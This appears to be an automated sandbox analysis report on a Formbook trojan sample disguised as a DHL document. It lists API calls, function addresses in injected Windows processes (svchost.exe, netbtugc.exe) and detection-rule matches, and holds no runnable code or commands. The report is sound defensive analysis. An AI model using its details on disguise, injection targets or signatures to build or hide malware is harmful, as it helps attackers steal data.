Code function: 0_2_00451201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00451201

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0045E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0045E8F6

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00462046	0_2_00462046
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_003F8060	0_2_003F8060
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00458298	0_2_00458298
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0042E4FF	0_2_0042E4FF
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0042676B	0_2_0042676B
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00484873	0_2_00484873
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_003FCAF0	0_2_003FCAF0
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0041CAA0	0_2_0041CAA0
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0040CC39	0_2_0040CC39
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00426DD9	0_2_00426DD9
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0040B119	0_2_0040B119
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_003F91C0	0_2_003F91C0
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00411394	0_2_00411394
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00411706	0_2_00411706
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0041781B	0_2_0041781B
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_003F7920	0_2_003F7920
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0040997D	0_2_0040997D
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_004119B0	0_2_004119B0
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00417A4A	0_2_00417A4A
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00411C77	0_2_00411C77
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00443CD2	0_2_00443CD2
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00417CA7	0_2_00417CA7
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0047BE44	0_2_0047BE44
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00429EEE	0_2_00429EEE
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00411F32	0_2_00411F32
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_003FBF40	0_2_003FBF40
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_011874F0	0_2_011874F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C6871	2_2_003C6871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C6873	2_2_003C6873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B28A0	2_2_003B28A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B1110	2_2_003B1110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C0173	2_2_003C0173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003BE1F3	2_2_003BE1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B1290	2_2_003B1290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B3500	2_2_003B3500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B26A0	2_2_003B26A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B2698	2_2_003B2698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B268A	2_2_003B268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003BFF53	2_2_003BFF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003DD753	2_2_003DD753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003BFF4A	2_2_003BFF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031003E6	2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C02C0	2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030100	2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F41A2	2_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031001AA	2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F81CC	2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064750	2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C6E0	2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03100591	2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4420	2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F2446	2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EE4F6	2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F6BD7	2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310A9A6	2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304A840	2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030268B8	2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E8F0	2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03082F28	2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060F30	2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E2F30	2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4F40	2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BEFA0	2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032FC8	2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304CFE0	2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEE26	2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040E59	2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052E90	2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FCE93	2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEEDB	2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304AD00	2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DCD1F	2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03058DBF	2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303ADE0	2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040C00	2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0CB5	2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030CF2	2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F132D	2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302D34C	2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0308739A	2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030452A0	2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B2C0	2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E12ED	2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307516C	2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302F172	2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310B16B	2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304B1B0	2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EF0CC	2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030470C0	2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F70E9	2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF0E0	2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF7B0	2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085630	2_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F16CC	2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7571	2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DD5B0	2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF43F	2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03031460	2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFB76	2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FB80	2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B5BF0	2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307DBF9	2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFA49	2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7A46	2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B3A6C	2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DDAAC	2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085AA0	2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E1AA3	2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EDAC6	2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D5910	2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049950	2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B950	2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AD800	2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030438E0	2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFF09	2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03041F92	2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFFB1	2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049EB0	2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03043D40	2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F1D5A	2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7D73	2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FDC0	2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B9C32	2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFCF2	2_2_030FFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323A352	10_2_0323A352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032403E6	10_2_032403E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0318E3F0	10_2_0318E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03220274	10_2_03220274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032002C0	10_2_032002C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03170100	10_2_03170100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0321A118	10_2_0321A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03208158	10_2_03208158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032341A2	10_2_032341A2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032401AA	10_2_032401AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032381CC	10_2_032381CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03212000	10_2_03212000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031A4750	10_2_031A4750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03180770	10_2_03180770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0317C7C0	10_2_0317C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0319C6E0	10_2_0319C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03180535	10_2_03180535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03240591	10_2_03240591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03224420	10_2_03224420
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03232446	10_2_03232446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0322E4F6	10_2_0322E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323AB40	10_2_0323AB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03236BD7	10_2_03236BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0317EA80	10_2_0317EA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03196962	10_2_03196962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0324A9A6	10_2_0324A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031829A0	10_2_031829A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0318A840	10_2_0318A840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03182840	10_2_03182840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031668B8	10_2_031668B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031AE8F0	10_2_031AE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03222F30	10_2_03222F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031A0F30	10_2_031A0F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031C2F28	10_2_031C2F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031F4F40	10_2_031F4F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031FEFA0	10_2_031FEFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03172FC8	10_2_03172FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0318CFE0	10_2_0318CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323EE26	10_2_0323EE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03180E59	10_2_03180E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03192E90	10_2_03192E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323CE93	10_2_0323CE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323EEDB	10_2_0323EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0318AD00	10_2_0318AD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0321CD1F	10_2_0321CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03198DBF	10_2_03198DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0317ADE0	10_2_0317ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03180C00	10_2_03180C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03220CB5	10_2_03220CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03170CF2	10_2_03170CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323132D	10_2_0323132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0316D34C	10_2_0316D34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031C739A	10_2_031C739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031852A0	10_2_031852A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032212ED	10_2_032212ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0319B2C0	10_2_0319B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0324B16B	10_2_0324B16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0316F172	10_2_0316F172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B516C	10_2_031B516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0318B1B0	10_2_0318B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323F0E0	10_2_0323F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032370E9	10_2_032370E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031870C0	10_2_031870C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0322F0CC	10_2_0322F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323F7B0	10_2_0323F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031C5630	10_2_031C5630
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032316CC	10_2_032316CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03237571	10_2_03237571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0321D5B0	10_2_0321D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_032495C3	10_2_032495C3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323F43F	10_2_0323F43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03171460	10_2_03171460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323FB76	10_2_0323FB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0319FB80	10_2_0319FB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031BDBF9	10_2_031BDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031F5BF0	10_2_031F5BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03237A46	10_2_03237A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323FA49	10_2_0323FA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031F3A6C	10_2_031F3A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03221AA3	10_2_03221AA3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0321DAAC	10_2_0321DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031C5AA0	10_2_031C5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0322DAC6	10_2_0322DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03215910	10_2_03215910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03189950	10_2_03189950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0319B950	10_2_0319B950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031ED800	10_2_031ED800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031838E0	10_2_031838E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323FF09	10_2_0323FF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03181F92	10_2_03181F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323FFB1	10_2_0323FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03143FD5	10_2_03143FD5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03143FD2	10_2_03143FD2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03189EB0	10_2_03189EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03237D73	10_2_03237D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03183D40	10_2_03183D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_03231D5A	10_2_03231D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0319FDC0	10_2_0319FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031F9C32	10_2_031F9C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0323FCF2	10_2_0323FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_027615E0	10_2_027615E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0275C7D0	10_2_0275C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0275C7C7	10_2_0275C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0275AA70	10_2_0275AA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_0275C9F0	10_2_0275C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_027630F0	10_2_027630F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_027630EE	10_2_027630EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02779FD0	10_2_02779FD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F7A0AF	10_2_02F7A0AF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F7B8B4	10_2_02F7B8B4
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F7B9D6	10_2_02F7B9D6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F7ADD8	10_2_02F7ADD8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02F7BD6C	10_2_02F7BD6C

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 103 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 031B5130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 031EEA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0316B970 appears 277 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 031C7E54 appears 111 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 031FF290 appears 105 times
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: String function: 003F9CB3 appears 31 times
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: String function: 00410A30 appears 46 times
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: String function: 0040F9F2 appears 40 times

Source: DHL-DOC83972025-1.exe, 00000000.00000003.1256773269.0000000003BD3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL-DOC83972025-1.exe
Source: DHL-DOC83972025-1.exe, 00000000.00000003.1255918170.0000000003D7D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL-DOC83972025-1.exe

Source: DHL-DOC83972025-1.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
